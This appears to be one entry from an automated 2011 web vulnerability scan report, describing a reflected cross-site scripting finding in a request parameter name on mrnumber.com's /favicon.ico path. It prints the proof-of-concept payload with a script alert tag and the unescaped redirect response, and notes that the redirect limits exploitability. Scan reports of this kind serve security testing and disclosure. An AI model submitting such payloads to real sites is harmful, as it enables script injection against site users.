3.202. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mrnumber.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 193b8<script>alert(1)</script>9fa070849 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 Found Location: http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1 Content-Type: text/html Content-Length: 264
<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1">http://mrnumber.com/favicon.ico?193b8<script>alert(1)</script>9fa070849=1</a> ...[SNIP]...
Report generated by XSS.CX at Fri Apr 22 23:36:39 CDT 2011.